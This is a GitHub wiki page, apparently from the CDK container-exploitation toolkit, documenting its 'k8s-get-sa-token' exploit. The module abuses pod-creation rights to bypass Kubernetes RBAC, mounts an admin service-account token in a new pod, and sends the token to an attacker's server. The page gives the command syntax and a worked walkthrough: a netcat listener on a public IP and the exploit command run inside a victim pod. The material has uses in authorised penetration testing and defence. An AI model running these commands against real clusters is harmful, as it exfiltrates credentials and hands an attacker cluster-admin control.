-
Notifications
You must be signed in to change notification settings - Fork 551
Exploit: k8s get sa token
cdxy edited this page Mar 17, 2021
·
1 revision
Bypass K8s RBAC with pod create privilege. This exploit will create a pod with target(admin) service-account token mounted, then read the token and send it to remote IP:Port.
绕过K8s RBAC:如果当前的Pod有创建Pod权限,即可利用本EXP进行提权到Cluster Admin。本EXP将创建一个Pod并挂在目标service-account的token,之后在Pod中读取该token并发送到攻击者的公网服务器。
cdk run k8s-get-sa-token (default|anonymous|<service-account-token-path>) <target-service-account> <ip> <port>"
Request Options:
default: connect API server with pod's default service account token
anonymous: connect API server with user system:anonymous
<service-account-token-path>: connect API server with user-specified service account token.
Exploit Options:
target-service-account: target service-account token to dump(e.g. admin).
ip: target remote IP to hijack traffic.
port: target remote PORT to hijack traffic.
First listen a port in a public server to receive data
(on attacker's public server, e.g. 39.104.80.49)
nc -lvp 999
Inside victim pod which has "create pod" privilege, run CDK exploit to dump "admin" service-account's token.
(in victim pod)
./cdk run k8s-get-sa-token default admin 39.104.80.49 999